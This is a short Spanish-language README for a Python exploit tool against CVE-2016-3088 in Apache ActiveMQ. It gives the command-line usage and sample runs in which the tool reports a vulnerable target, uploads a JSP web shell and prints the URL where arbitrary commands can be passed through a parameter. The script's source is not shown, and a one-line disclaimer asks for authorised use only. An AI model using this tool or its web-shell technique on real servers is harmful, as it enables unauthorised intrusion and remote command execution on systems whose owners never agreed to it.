
Un script de exploit basado en Python para CVE-2016-3088
Un script de exploit basado en Python para CVE-2016-3088.
Este es mi primer script, así que puede que algo no encaje del todo.
Pero parece que funciona bien cuando lo probé.
Este script puede eliminar la necesidad de capturar paquetes durante la explotación de CVE-2016-3088,
por lo que podemos escribir y mover el archivo directamente.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
El parámetro --script es opcional; si ejecutas el programa sin él, se utilizará el payload integrado.
El payload solo te permite ejecutar algunos comandos en la URL.
Pero puedes introducir otros scripts para lograr tu propósito.
Solo descarga el .py.
Y requiere algunos módulos.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Por favor, utiliza esta herramienta con cuidado y solo cuando estés autorizado.